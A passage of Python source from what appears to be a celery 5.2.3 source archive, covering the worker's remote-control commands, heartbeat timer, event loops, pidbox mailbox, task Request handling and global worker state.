""" try: import objgraph as _objgraph except ImportError: raise ImportError('Requires the objgraph library') logger.info('Dumping graph for type %r', type) with tempfile.NamedTemporaryFile(prefix='cobjg', suffix='.png', delete=False) as fh: objects = _objgraph.by_type(type)[:num] _objgraph.show_backrefs( objects, max_depth=max_depth, highlight=lambda v: v in objects, filename=fh.name, ) return {'filename': fh.name} @inspect_command() def memsample(state, **kwargs): """Sample current RSS memory usage.""" from celery.utils.debug import sample_mem return sample_mem() @inspect_command( args=[('samples', int)], signature='[n_samples=10]', ) def memdump(state, samples=10, **kwargs): # pragma: no cover """Dump statistics of previous memsample requests.""" from celery.utils import debug out = io.StringIO() debug.memdump(file=out) return out.getvalue() # -- Pool @control_command( args=[('n', int)], signature='[N=1]', ) def pool_grow(state, n=1, **kwargs): """Grow pool by n processes/threads.""" if state.consumer.controller.autoscaler: return nok("pool_grow is not supported with autoscale. Adjust autoscale range instead.") else: state.consumer.pool.grow(n) state.consumer._update_prefetch_count(n) return ok('pool will grow') @control_command( args=[('n', int)], signature='[N=1]', ) def pool_shrink(state, n=1, **kwargs): """Shrink pool by n processes/threads.""" if state.consumer.controller.autoscaler: return nok("pool_shrink is not supported with autoscale. Adjust autoscale range instead.") else: state.consumer.pool.shrink(n) state.consumer._update_prefetch_count(-n) return ok('pool will shrink') @control_command() def pool_restart(state, modules=None, reload=False, reloader=None, **kwargs): """Restart execution pool.""" if state.app.conf.worker_pool_restarts: state.consumer.controller.reload(modules, reload, reloader=reloader) return ok('reload started') else: raise ValueError('Pool restarts not enabled') @control_command( args=[('max', int), ('min', int)], signature='[max [min]]', ) def autoscale(state, max=None, min=None): """Modify autoscale settings.""" autoscaler = state.consumer.controller.autoscaler if autoscaler: max_, min_ = autoscaler.update(max, min) return ok(f'autoscale now max={max_} min={min_}') raise ValueError('Autoscale not enabled') @control_command() def shutdown(state, msg='Got shutdown from remote', **kwargs): """Shutdown worker(s).""" logger.warning(msg) raise WorkerShutdown(msg) # -- Queues @control_command( args=[ ('queue', str), ('exchange', str), ('exchange_type', str), ('routing_key', str), ], signature=' [exchange [type [routing_key]]]', ) def add_consumer(state, queue, exchange=None, exchange_type=None, routing_key=None, **options): """Tell worker(s) to consume from task queue by name.""" state.consumer.call_soon( state.consumer.add_task_queue, queue, exchange, exchange_type or 'direct', routing_key, **options) return ok(f'add consumer {queue}') @control_command( args=[('queue', str)], signature='', ) def cancel_consumer(state, queue, **_): """Tell worker(s) to stop consuming from task queue by name.""" state.consumer.call_soon( state.consumer.cancel_task_queue, queue, ) return ok(f'no longer consuming from {queue}') @inspect_command() def active_queues(state): """List the task queues a worker is currently consuming from.""" if state.consumer.task_consumer: return [dict(queue.as_dict(recurse=True)) for queue in state.consumer.task_consumer.queues] return [] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 
celery-5.2.3/celery/worker/heartbeat.py0000664000175000017500000000407300000000000020006 0ustar00asifasif00000000000000"""Heartbeat service. This is the internal thread responsible for sending heartbeat events at regular intervals (may not be an actual thread). """ from celery.signals import heartbeat_sent from celery.utils.sysinfo import load_average from .state import SOFTWARE_INFO, active_requests, all_total_count __all__ = ('Heart',) class Heart: """Timer sending heartbeats at regular intervals. Arguments: timer (kombu.asynchronous.timer.Timer): Timer to use. eventer (celery.events.EventDispatcher): Event dispatcher to use. interval (float): Time in seconds between sending heartbeats. Default is 2 seconds. """ def __init__(self, timer, eventer, interval=None): self.timer = timer self.eventer = eventer self.interval = float(interval or 2.0) self.tref = None # Make event dispatcher start/stop us when enabled/disabled. self.eventer.on_enabled.add(self.start) self.eventer.on_disabled.add(self.stop) # Only send heartbeat_sent signal if it has receivers. self._send_sent_signal = ( heartbeat_sent.send if heartbeat_sent.receivers else None) def _send(self, event, retry=True): if self._send_sent_signal is not None: self._send_sent_signal(sender=self) return self.eventer.send(event, freq=self.interval, active=len(active_requests), processed=all_total_count[0], loadavg=load_average(), retry=retry, **SOFTWARE_INFO) def start(self): if self.eventer.enabled: self._send('worker-online') self.tref = self.timer.call_repeatedly( self.interval, self._send, ('worker-heartbeat',), ) def stop(self): if self.tref is not None: self.timer.cancel(self.tref) self.tref = None if self.eventer.enabled: self._send('worker-offline', retry=False) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/loops.py0000664000175000017500000001052100000000000017176 0ustar00asifasif00000000000000"""The consumers highly-optimized inner loop.""" import errno import socket from celery import bootsteps from celery.exceptions import WorkerLostError from celery.utils.log import get_logger from . import state __all__ = ('asynloop', 'synloop') # pylint: disable=redefined-outer-name # We cache globals and attribute lookups, so disable this warning. 
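# --- Illustrative sketch of the Heart contract defined above (not part of the
# original module).  The worker's Heart bootstep normally supplies the timer
# and the event dispatcher; this only shows what Heart expects of them.
# ``_StubEventer`` is a hypothetical stand-in, not a Celery class.

from kombu.asynchronous.timer import Timer

from celery.worker.heartbeat import Heart


class _StubEventer:
    """Minimal object with the attributes Heart uses."""

    def __init__(self):
        self.enabled = True
        self.on_enabled = set()     # Heart registers start() here
        self.on_disabled = set()    # ... and stop() here
        self.sent = []

    def send(self, event, **fields):
        self.sent.append((event, fields))


def _demo_heart():
    timer = Timer()                  # the real worker passes the hub timer
    heart = Heart(timer, _StubEventer(), interval=2.0)
    heart.start()    # emits 'worker-online', schedules repeating heartbeats
    heart.stop()     # cancels the timer entry, emits 'worker-offline'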
logger = get_logger(__name__) def _quick_drain(connection, timeout=0.1): try: connection.drain_events(timeout=timeout) except Exception as exc: # pylint: disable=broad-except exc_errno = getattr(exc, 'errno', None) if exc_errno is not None and exc_errno != errno.EAGAIN: raise def _enable_amqheartbeats(timer, connection, rate=2.0): heartbeat_error = [None] if not connection: return heartbeat_error heartbeat = connection.get_heartbeat_interval() # negotiated if not (heartbeat and connection.supports_heartbeats): return heartbeat_error def tick(rate): try: connection.heartbeat_check(rate) except Exception as e: # heartbeat_error is passed by reference can be updated # no append here list should be fixed size=1 heartbeat_error[0] = e timer.call_repeatedly(heartbeat / rate, tick, (rate,)) return heartbeat_error def asynloop(obj, connection, consumer, blueprint, hub, qos, heartbeat, clock, hbrate=2.0): """Non-blocking event loop.""" RUN = bootsteps.RUN update_qos = qos.update errors = connection.connection_errors on_task_received = obj.create_task_handler() heartbeat_error = _enable_amqheartbeats(hub.timer, connection, rate=hbrate) consumer.on_message = on_task_received obj.controller.register_with_event_loop(hub) obj.register_with_event_loop(hub) consumer.consume() obj.on_ready() # did_start_ok will verify that pool processes were able to start, # but this will only work the first time we start, as # maxtasksperchild will mess up metrics. if not obj.restart_count and not obj.pool.did_start_ok(): raise WorkerLostError('Could not start worker processes') # consumer.consume() may have prefetched up to our # limit - drain an event so we're in a clean state # prior to starting our event loop. if connection.transport.driver_type == 'amqp': hub.call_soon(_quick_drain, connection) # FIXME: Use loop.run_forever # Tried and works, but no time to test properly before release. hub.propagate_errors = errors loop = hub.create_loop() try: while blueprint.state == RUN and obj.connection: state.maybe_shutdown() if heartbeat_error[0] is not None: raise heartbeat_error[0] # We only update QoS when there's no more messages to read. # This groups together qos calls, and makes sure that remote # control commands will be prioritized over task messages. 
if qos.prev != qos.value: update_qos() try: next(loop) except StopIteration: loop = hub.create_loop() finally: try: hub.reset() except Exception as exc: # pylint: disable=broad-except logger.exception( 'Error cleaning up after event loop: %r', exc) def synloop(obj, connection, consumer, blueprint, hub, qos, heartbeat, clock, hbrate=2.0, **kwargs): """Fallback blocking event loop for transports that doesn't support AIO.""" RUN = bootsteps.RUN on_task_received = obj.create_task_handler() perform_pending_operations = obj.perform_pending_operations heartbeat_error = [None] if getattr(obj.pool, 'is_green', False): heartbeat_error = _enable_amqheartbeats(obj.timer, connection, rate=hbrate) consumer.on_message = on_task_received consumer.consume() obj.on_ready() while blueprint.state == RUN and obj.connection: state.maybe_shutdown() if heartbeat_error[0] is not None: raise heartbeat_error[0] if qos.prev != qos.value: qos.update() try: perform_pending_operations() connection.drain_events(timeout=2.0) except socket.timeout: pass except OSError: if blueprint.state == RUN: raise ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/pidbox.py0000664000175000017500000000705600000000000017340 0ustar00asifasif00000000000000"""Worker Pidbox (remote control).""" import socket import threading from kombu.common import ignore_errors from kombu.utils.encoding import safe_str from celery.utils.collections import AttributeDict from celery.utils.functional import pass1 from celery.utils.log import get_logger from . import control __all__ = ('Pidbox', 'gPidbox') logger = get_logger(__name__) debug, error, info = logger.debug, logger.error, logger.info class Pidbox: """Worker mailbox.""" consumer = None def __init__(self, c): self.c = c self.hostname = c.hostname self.node = c.app.control.mailbox.Node( safe_str(c.hostname), handlers=control.Panel.data, state=AttributeDict( app=c.app, hostname=c.hostname, consumer=c, tset=pass1 if c.controller.use_eventloop else set), ) self._forward_clock = self.c.app.clock.forward def on_message(self, body, message): # just increase clock as clients usually don't # have a valid clock to adjust with. 
self._forward_clock() try: self.node.handle_message(body, message) except KeyError as exc: error('No such control command: %s', exc) except Exception as exc: error('Control command error: %r', exc, exc_info=True) self.reset() def start(self, c): self.node.channel = c.connection.channel() self.consumer = self.node.listen(callback=self.on_message) self.consumer.on_decode_error = c.on_decode_error def on_stop(self): pass def stop(self, c): self.on_stop() self.consumer = self._close_channel(c) def reset(self): self.stop(self.c) self.start(self.c) def _close_channel(self, c): if self.node and self.node.channel: ignore_errors(c, self.node.channel.close) def shutdown(self, c): self.on_stop() if self.consumer: debug('Canceling broadcast consumer...') ignore_errors(c, self.consumer.cancel) self.stop(self.c) class gPidbox(Pidbox): """Worker pidbox (greenlet).""" _node_shutdown = None _node_stopped = None _resets = 0 def start(self, c): c.pool.spawn_n(self.loop, c) def on_stop(self): if self._node_stopped: self._node_shutdown.set() debug('Waiting for broadcast thread to shutdown...') self._node_stopped.wait() self._node_stopped = self._node_shutdown = None def reset(self): self._resets += 1 def _do_reset(self, c, connection): self._close_channel(c) self.node.channel = connection.channel() self.consumer = self.node.listen(callback=self.on_message) self.consumer.consume() def loop(self, c): resets = [self._resets] shutdown = self._node_shutdown = threading.Event() stopped = self._node_stopped = threading.Event() try: with c.connection_for_read() as connection: info('pidbox: Connected to %s.', connection.as_uri()) self._do_reset(c, connection) while not shutdown.is_set() and c.connection: if resets[0] < self._resets: resets[0] += 1 self._do_reset(c, connection) try: connection.drain_events(timeout=1.0) except socket.timeout: pass finally: stopped.set() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/celery/worker/request.py0000664000175000017500000006117600000000000017546 0ustar00asifasif00000000000000"""Task request. This module defines the :class:`Request` class, that specifies how tasks are executed. """ import logging import sys from datetime import datetime from time import monotonic, time from weakref import ref from billiard.common import TERM_SIGNAME from kombu.utils.encoding import safe_repr, safe_str from kombu.utils.objects import cached_property from celery import current_app, signals from celery.app.task import Context from celery.app.trace import fast_trace_task, trace_task, trace_task_ret from celery.exceptions import (Ignore, InvalidTaskError, Reject, Retry, TaskRevokedError, Terminated, TimeLimitExceeded, WorkerLostError) from celery.platforms import signals as _signals from celery.utils.functional import maybe, noop from celery.utils.log import get_logger from celery.utils.nodenames import gethostname from celery.utils.serialization import get_pickled_exception from celery.utils.time import maybe_iso8601, maybe_make_aware, timezone from . import state __all__ = ('Request',) # pylint: disable=redefined-outer-name # We cache globals and attribute lookups, so disable this warning. 
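# --- Illustrative sketch (not part of the original module).  The Pidbox above
# dispatches control messages to handlers registered through the
# @control_command / @inspect_command decorators seen in
# celery/worker/control.py; a custom command can be registered the same way.
# The command name, its body and the broadcast call in the trailing comment
# are examples, not part of Celery itself.

from celery.worker.control import control_command


@control_command(
    args=[('n', int)],
    signature='[N=1]',
)
def increase_prefetch_count(state, n=1):
    # ``state.consumer`` is the worker's Consumer instance, exactly as in the
    # built-in handlers above.
    state.consumer.qos.increment_eventually(n)
    return {'ok': 'prefetch count incremented'}

# A client would then invoke it with something like:
#   app.control.broadcast('increase_prefetch_count', arguments={'n': 3})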
IS_PYPY = hasattr(sys, 'pypy_version_info') logger = get_logger(__name__) debug, info, warn, error = (logger.debug, logger.info, logger.warning, logger.error) _does_info = False _does_debug = False def __optimize__(): # this is also called by celery.app.trace.setup_worker_optimizations global _does_debug global _does_info _does_debug = logger.isEnabledFor(logging.DEBUG) _does_info = logger.isEnabledFor(logging.INFO) __optimize__() # Localize tz_or_local = timezone.tz_or_local send_revoked = signals.task_revoked.send send_retry = signals.task_retry.send task_accepted = state.task_accepted task_ready = state.task_ready revoked_tasks = state.revoked class Request: """A request for task execution.""" acknowledged = False time_start = None worker_pid = None time_limits = (None, None) _already_revoked = False _already_cancelled = False _terminate_on_ack = None _apply_result = None _tzlocal = None if not IS_PYPY: # pragma: no cover __slots__ = ( '_app', '_type', 'name', 'id', '_root_id', '_parent_id', '_on_ack', '_body', '_hostname', '_eventer', '_connection_errors', '_task', '_eta', '_expires', '_request_dict', '_on_reject', '_utc', '_content_type', '_content_encoding', '_argsrepr', '_kwargsrepr', '_args', '_kwargs', '_decoded', '__payload', '__weakref__', '__dict__', ) def __init__(self, message, on_ack=noop, hostname=None, eventer=None, app=None, connection_errors=None, request_dict=None, task=None, on_reject=noop, body=None, headers=None, decoded=False, utc=True, maybe_make_aware=maybe_make_aware, maybe_iso8601=maybe_iso8601, **opts): self._message = message self._request_dict = (message.headers.copy() if headers is None else headers.copy()) self._body = message.body if body is None else body self._app = app self._utc = utc self._decoded = decoded if decoded: self._content_type = self._content_encoding = None else: self._content_type, self._content_encoding = ( message.content_type, message.content_encoding, ) self.__payload = self._body if self._decoded else message.payload self.id = self._request_dict['id'] self._type = self.name = self._request_dict['task'] if 'shadow' in self._request_dict: self.name = self._request_dict['shadow'] or self.name self._root_id = self._request_dict.get('root_id') self._parent_id = self._request_dict.get('parent_id') timelimit = self._request_dict.get('timelimit', None) if timelimit: self.time_limits = timelimit self._argsrepr = self._request_dict.get('argsrepr', '') self._kwargsrepr = self._request_dict.get('kwargsrepr', '') self._on_ack = on_ack self._on_reject = on_reject self._hostname = hostname or gethostname() self._eventer = eventer self._connection_errors = connection_errors or () self._task = task or self._app.tasks[self._type] self._ignore_result = self._request_dict.get('ignore_result', False) # timezone means the message is timezone-aware, and the only timezone # supported at this point is UTC. 
eta = self._request_dict.get('eta') if eta is not None: try: eta = maybe_iso8601(eta) except (AttributeError, ValueError, TypeError) as exc: raise InvalidTaskError( f'invalid ETA value {eta!r}: {exc}') self._eta = maybe_make_aware(eta, self.tzlocal) else: self._eta = None expires = self._request_dict.get('expires') if expires is not None: try: expires = maybe_iso8601(expires) except (AttributeError, ValueError, TypeError) as exc: raise InvalidTaskError( f'invalid expires value {expires!r}: {exc}') self._expires = maybe_make_aware(expires, self.tzlocal) else: self._expires = None delivery_info = message.delivery_info or {} properties = message.properties or {} self._delivery_info = { 'exchange': delivery_info.get('exchange'), 'routing_key': delivery_info.get('routing_key'), 'priority': properties.get('priority'), 'redelivered': delivery_info.get('redelivered'), } self._request_dict.update({ 'properties': properties, 'reply_to': properties.get('reply_to'), 'correlation_id': properties.get('correlation_id'), 'hostname': self._hostname, 'delivery_info': self._delivery_info }) # this is a reference pass to avoid memory usage burst self._request_dict['args'], self._request_dict['kwargs'], _ = self.__payload self._args = self._request_dict['args'] self._kwargs = self._request_dict['kwargs'] @property def delivery_info(self): return self._delivery_info @property def message(self): return self._message @property def request_dict(self): return self._request_dict @property def body(self): return self._body @property def app(self): return self._app @property def utc(self): return self._utc @property def content_type(self): return self._content_type @property def content_encoding(self): return self._content_encoding @property def type(self): return self._type @property def root_id(self): return self._root_id @property def parent_id(self): return self._parent_id @property def argsrepr(self): return self._argsrepr @property def args(self): return self._args @property def kwargs(self): return self._kwargs @property def kwargsrepr(self): return self._kwargsrepr @property def on_ack(self): return self._on_ack @property def on_reject(self): return self._on_reject @on_reject.setter def on_reject(self, value): self._on_reject = value @property def hostname(self): return self._hostname @property def ignore_result(self): return self._ignore_result @property def eventer(self): return self._eventer @eventer.setter def eventer(self, eventer): self._eventer = eventer @property def connection_errors(self): return self._connection_errors @property def task(self): return self._task @property def eta(self): return self._eta @property def expires(self): return self._expires @expires.setter def expires(self, value): self._expires = value @property def tzlocal(self): if self._tzlocal is None: self._tzlocal = self._app.conf.timezone return self._tzlocal @property def store_errors(self): return (not self.task.ignore_result or self.task.store_errors_even_if_ignored) @property def task_id(self): # XXX compat return self.id @task_id.setter def task_id(self, value): self.id = value @property def task_name(self): # XXX compat return self.name @task_name.setter def task_name(self, value): self.name = value @property def reply_to(self): # used by rpc backend when failures reported by parent process return self._request_dict['reply_to'] @property def replaced_task_nesting(self): return self._request_dict.get('replaced_task_nesting', 0) @property def correlation_id(self): # used similarly to reply_to return 
self._request_dict['correlation_id'] def execute_using_pool(self, pool, **kwargs): """Used by the worker to send this task to the pool. Arguments: pool (~celery.concurrency.base.TaskPool): The execution pool used to execute this request. Raises: celery.exceptions.TaskRevokedError: if the task was revoked. """ task_id = self.id task = self._task if self.revoked(): raise TaskRevokedError(task_id) time_limit, soft_time_limit = self.time_limits trace = fast_trace_task if self._app.use_fast_trace_task else trace_task_ret result = pool.apply_async( trace, args=(self._type, task_id, self._request_dict, self._body, self._content_type, self._content_encoding), accept_callback=self.on_accepted, timeout_callback=self.on_timeout, callback=self.on_success, error_callback=self.on_failure, soft_timeout=soft_time_limit or task.soft_time_limit, timeout=time_limit or task.time_limit, correlation_id=task_id, ) # cannot create weakref to None self._apply_result = maybe(ref, result) return result def execute(self, loglevel=None, logfile=None): """Execute the task in a :func:`~celery.app.trace.trace_task`. Arguments: loglevel (int): The loglevel used by the task. logfile (str): The logfile used by the task. """ if self.revoked(): return # acknowledge task as being processed. if not self.task.acks_late: self.acknowledge() _, _, embed = self._payload request = self._request_dict # pylint: disable=unpacking-non-sequence # payload is a property, so pylint doesn't think it's a tuple. request.update({ 'loglevel': loglevel, 'logfile': logfile, 'is_eager': False, }, **embed or {}) retval, I, _, _ = trace_task(self.task, self.id, self._args, self._kwargs, request, hostname=self._hostname, loader=self._app.loader, app=self._app) if I: self.reject(requeue=False) else: self.acknowledge() return retval def maybe_expire(self): """If expired, mark the task as revoked.""" if self._expires: now = datetime.now(self._expires.tzinfo) if now > self._expires: revoked_tasks.add(self.id) return True def terminate(self, pool, signal=None): signal = _signals.signum(signal or TERM_SIGNAME) if self.time_start: pool.terminate_job(self.worker_pid, signal) self._announce_revoked('terminated', True, signal, False) else: self._terminate_on_ack = pool, signal if self._apply_result is not None: obj = self._apply_result() # is a weakref if obj is not None: obj.terminate(signal) def cancel(self, pool, signal=None): signal = _signals.signum(signal or TERM_SIGNAME) if self.time_start: pool.terminate_job(self.worker_pid, signal) self._announce_cancelled() if self._apply_result is not None: obj = self._apply_result() # is a weakref if obj is not None: obj.terminate(signal) def _announce_cancelled(self): task_ready(self) self.send_event('task-cancelled') reason = 'cancelled by Celery' exc = Retry(message=reason) self.task.backend.mark_as_retry(self.id, exc, request=self._context) self.task.on_retry(exc, self.id, self.args, self.kwargs, None) self._already_cancelled = True send_retry(self.task, request=self._context, einfo=None) def _announce_revoked(self, reason, terminated, signum, expired): task_ready(self) self.send_event('task-revoked', terminated=terminated, signum=signum, expired=expired) self.task.backend.mark_as_revoked( self.id, reason, request=self._context, store_result=self.store_errors, ) self.acknowledge() self._already_revoked = True send_revoked(self.task, request=self._context, terminated=terminated, signum=signum, expired=expired) def revoked(self): """If revoked, skip task and mark state.""" expired = False if self._already_revoked: 
return True if self._expires: expired = self.maybe_expire() if self.id in revoked_tasks: info('Discarding revoked task: %s[%s]', self.name, self.id) self._announce_revoked( 'expired' if expired else 'revoked', False, None, expired, ) return True return False def send_event(self, type, **fields): if self._eventer and self._eventer.enabled and self.task.send_events: self._eventer.send(type, uuid=self.id, **fields) def on_accepted(self, pid, time_accepted): """Handler called when task is accepted by worker pool.""" self.worker_pid = pid # Convert monotonic time_accepted to absolute time self.time_start = time() - (monotonic() - time_accepted) task_accepted(self) if not self.task.acks_late: self.acknowledge() self.send_event('task-started') if _does_debug: debug('Task accepted: %s[%s] pid:%r', self.name, self.id, pid) if self._terminate_on_ack is not None: self.terminate(*self._terminate_on_ack) def on_timeout(self, soft, timeout): """Handler called if the task times out.""" if soft: warn('Soft time limit (%ss) exceeded for %s[%s]', timeout, self.name, self.id) else: task_ready(self) error('Hard time limit (%ss) exceeded for %s[%s]', timeout, self.name, self.id) exc = TimeLimitExceeded(timeout) self.task.backend.mark_as_failure( self.id, exc, request=self._context, store_result=self.store_errors, ) if self.task.acks_late and self.task.acks_on_failure_or_timeout: self.acknowledge() def on_success(self, failed__retval__runtime, **kwargs): """Handler called if the task was successfully processed.""" failed, retval, runtime = failed__retval__runtime if failed: if isinstance(retval.exception, (SystemExit, KeyboardInterrupt)): raise retval.exception return self.on_failure(retval, return_ok=True) task_ready(self, successful=True) if self.task.acks_late: self.acknowledge() self.send_event('task-succeeded', result=retval, runtime=runtime) def on_retry(self, exc_info): """Handler called if the task should be retried.""" if self.task.acks_late: self.acknowledge() self.send_event('task-retried', exception=safe_repr(exc_info.exception.exc), traceback=safe_str(exc_info.traceback)) def on_failure(self, exc_info, send_failed_event=True, return_ok=False): """Handler called if the task raised an exception.""" task_ready(self) exc = exc_info.exception is_terminated = isinstance(exc, Terminated) if is_terminated: # If the task was terminated and the task was not cancelled due # to a connection loss, it is revoked. # We always cancel the tasks inside the master process. # If the request was cancelled, it was not revoked and there's # nothing to be done. # According to the comment below, we need to check if the task # is already revoked and if it wasn't, we should announce that # it was. if not self._already_cancelled and not self._already_revoked: # This is a special case where the process # would not have had time to write the result. self._announce_revoked( 'terminated', True, str(exc), False) return elif isinstance(exc, MemoryError): raise MemoryError(f'Process got: {exc}') elif isinstance(exc, Reject): return self.reject(requeue=exc.requeue) elif isinstance(exc, Ignore): return self.acknowledge() elif isinstance(exc, Retry): return self.on_retry(exc_info) # (acks_late) acknowledge after result stored. 
requeue = False is_worker_lost = isinstance(exc, WorkerLostError) if self.task.acks_late: reject = ( self.task.reject_on_worker_lost and is_worker_lost ) ack = self.task.acks_on_failure_or_timeout if reject: requeue = True self.reject(requeue=requeue) send_failed_event = False elif ack: self.acknowledge() else: # supporting the behaviour where a task failed and # need to be removed from prefetched local queue self.reject(requeue=False) # This is a special case where the process would not have had time # to write the result. if not requeue and (is_worker_lost or not return_ok): # only mark as failure if task has not been requeued self.task.backend.mark_as_failure( self.id, exc, request=self._context, store_result=self.store_errors, ) signals.task_failure.send(sender=self.task, task_id=self.id, exception=exc, args=self.args, kwargs=self.kwargs, traceback=exc_info.traceback, einfo=exc_info) if send_failed_event: self.send_event( 'task-failed', exception=safe_repr(get_pickled_exception(exc_info.exception)), traceback=exc_info.traceback, ) if not return_ok: error('Task handler raised error: %r', exc, exc_info=exc_info.exc_info) def acknowledge(self): """Acknowledge task.""" if not self.acknowledged: self._on_ack(logger, self._connection_errors) self.acknowledged = True def reject(self, requeue=False): if not self.acknowledged: self._on_reject(logger, self._connection_errors, requeue) self.acknowledged = True self.send_event('task-rejected', requeue=requeue) def info(self, safe=False): return { 'id': self.id, 'name': self.name, 'args': self._args if not safe else self._argsrepr, 'kwargs': self._kwargs if not safe else self._kwargsrepr, 'type': self._type, 'hostname': self._hostname, 'time_start': self.time_start, 'acknowledged': self.acknowledged, 'delivery_info': self.delivery_info, 'worker_pid': self.worker_pid, } def humaninfo(self): return '{0.name}[{0.id}]'.format(self) def __str__(self): """``str(self)``.""" return ' '.join([ self.humaninfo(), f' ETA:[{self._eta}]' if self._eta else '', f' expires:[{self._expires}]' if self._expires else '', ]).strip() def __repr__(self): """``repr(self)``.""" return '<{}: {} {} {}>'.format( type(self).__name__, self.humaninfo(), self._argsrepr, self._kwargsrepr, ) @cached_property def _payload(self): return self.__payload @cached_property def chord(self): # used by backend.mark_as_failure when failure is reported # by parent process # pylint: disable=unpacking-non-sequence # payload is a property, so pylint doesn't think it's a tuple. _, _, embed = self._payload return embed.get('chord') @cached_property def errbacks(self): # used by backend.mark_as_failure when failure is reported # by parent process # pylint: disable=unpacking-non-sequence # payload is a property, so pylint doesn't think it's a tuple. _, _, embed = self._payload return embed.get('errbacks') @cached_property def group(self): # used by backend.on_chord_part_return when failures reported # by parent process return self._request_dict.get('group') @cached_property def _context(self): """Context (:class:`~celery.app.task.Context`) of this task.""" request = self._request_dict # pylint: disable=unpacking-non-sequence # payload is a property, so pylint doesn't think it's a tuple. 
_, _, embed = self._payload request.update(**embed or {}) return Context(request) @cached_property def group_index(self): # used by backend.on_chord_part_return to order return values in group return self._request_dict.get('group_index') def create_request_cls(base, task, pool, hostname, eventer, ref=ref, revoked_tasks=revoked_tasks, task_ready=task_ready, trace=None, app=current_app): default_time_limit = task.time_limit default_soft_time_limit = task.soft_time_limit apply_async = pool.apply_async acks_late = task.acks_late events = eventer and eventer.enabled if trace is None: trace = fast_trace_task if app.use_fast_trace_task else trace_task_ret class Request(base): def execute_using_pool(self, pool, **kwargs): task_id = self.task_id if (self.expires or task_id in revoked_tasks) and self.revoked(): raise TaskRevokedError(task_id) time_limit, soft_time_limit = self.time_limits result = apply_async( trace, args=(self.type, task_id, self.request_dict, self.body, self.content_type, self.content_encoding), accept_callback=self.on_accepted, timeout_callback=self.on_timeout, callback=self.on_success, error_callback=self.on_failure, soft_timeout=soft_time_limit or default_soft_time_limit, timeout=time_limit or default_time_limit, correlation_id=task_id, ) # cannot create weakref to None # pylint: disable=attribute-defined-outside-init self._apply_result = maybe(ref, result) return result def on_success(self, failed__retval__runtime, **kwargs): failed, retval, runtime = failed__retval__runtime if failed: if isinstance(retval.exception, ( SystemExit, KeyboardInterrupt)): raise retval.exception return self.on_failure(retval, return_ok=True) task_ready(self) if acks_late: self.acknowledge() if events: self.send_event( 'task-succeeded', result=retval, runtime=runtime, ) return Request ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/worker/state.py0000664000175000017500000001776100000000000017177 0ustar00asifasif00000000000000"""Internal worker state (global). This includes the currently active and reserved tasks, statistics, and revoked tasks. """ import os import platform import shelve import sys import weakref import zlib from collections import Counter from kombu.serialization import pickle, pickle_protocol from kombu.utils.objects import cached_property from celery import __version__ from celery.exceptions import WorkerShutdown, WorkerTerminate from celery.utils.collections import LimitedSet __all__ = ( 'SOFTWARE_INFO', 'reserved_requests', 'active_requests', 'total_count', 'revoked', 'task_reserved', 'maybe_shutdown', 'task_accepted', 'task_ready', 'Persistent', ) #: Worker software/platform information. SOFTWARE_INFO = { 'sw_ident': 'py-celery', 'sw_ver': __version__, 'sw_sys': platform.system(), } #: maximum number of revokes to keep in memory. REVOKES_MAX = 50000 #: maximum number of successful tasks to keep in memory. SUCCESSFUL_MAX = 1000 #: how many seconds a revoke will be active before #: being expired when the max limit has been exceeded. REVOKE_EXPIRES = 10800 #: how many seconds a successful task will be cached in memory #: before being expired when the max limit has been exceeded. SUCCESSFUL_EXPIRES = 10800 #: Mapping of reserved task_id->Request. requests = {} #: set of all reserved :class:`~celery.worker.request.Request`'s. reserved_requests = weakref.WeakSet() #: set of currently active :class:`~celery.worker.request.Request`'s. 
active_requests = weakref.WeakSet() #: A limited set of successful :class:`~celery.worker.request.Request`'s. successful_requests = LimitedSet(maxlen=SUCCESSFUL_MAX, expires=SUCCESSFUL_EXPIRES) #: count of tasks accepted by the worker, sorted by type. total_count = Counter() #: count of all tasks accepted by the worker all_total_count = [0] #: the list of currently revoked tasks. Persistent if ``statedb`` set. revoked = LimitedSet(maxlen=REVOKES_MAX, expires=REVOKE_EXPIRES) should_stop = None should_terminate = None def reset_state(): requests.clear() reserved_requests.clear() active_requests.clear() successful_requests.clear() total_count.clear() all_total_count[:] = [0] revoked.clear() def maybe_shutdown(): """Shutdown if flags have been set.""" if should_terminate is not None and should_terminate is not False: raise WorkerTerminate(should_terminate) elif should_stop is not None and should_stop is not False: raise WorkerShutdown(should_stop) def task_reserved(request, add_request=requests.__setitem__, add_reserved_request=reserved_requests.add): """Update global state when a task has been reserved.""" add_request(request.id, request) add_reserved_request(request) def task_accepted(request, _all_total_count=None, add_active_request=active_requests.add, add_to_total_count=total_count.update): """Update global state when a task has been accepted.""" if not _all_total_count: _all_total_count = all_total_count add_active_request(request) add_to_total_count({request.name: 1}) all_total_count[0] += 1 def task_ready(request, successful=False, remove_request=requests.pop, discard_active_request=active_requests.discard, discard_reserved_request=reserved_requests.discard): """Update global state when a task is ready.""" if successful: successful_requests.add(request.id) remove_request(request.id, None) discard_active_request(request) discard_reserved_request(request) C_BENCH = os.environ.get('C_BENCH') or os.environ.get('CELERY_BENCH') C_BENCH_EVERY = int(os.environ.get('C_BENCH_EVERY') or os.environ.get('CELERY_BENCH_EVERY') or 1000) if C_BENCH: # pragma: no cover import atexit from time import monotonic from billiard.process import current_process from celery.utils.debug import memdump, sample_mem all_count = 0 bench_first = None bench_start = None bench_last = None bench_every = C_BENCH_EVERY bench_sample = [] __reserved = task_reserved __ready = task_ready if current_process()._name == 'MainProcess': @atexit.register def on_shutdown(): if bench_first is not None and bench_last is not None: print('- Time spent in benchmark: {!r}'.format( bench_last - bench_first)) print('- Avg: {}'.format( sum(bench_sample) / len(bench_sample))) memdump() def task_reserved(request): """Called when a task is reserved by the worker.""" global bench_start global bench_first now = None if bench_start is None: bench_start = now = monotonic() if bench_first is None: bench_first = now return __reserved(request) def task_ready(request): """Called when a task is completed.""" global all_count global bench_start global bench_last all_count += 1 if not all_count % bench_every: now = monotonic() diff = now - bench_start print('- Time spent processing {} tasks (since first ' 'task received): ~{:.4f}s\n'.format(bench_every, diff)) sys.stdout.flush() bench_start = bench_last = now bench_sample.append(diff) sample_mem() return 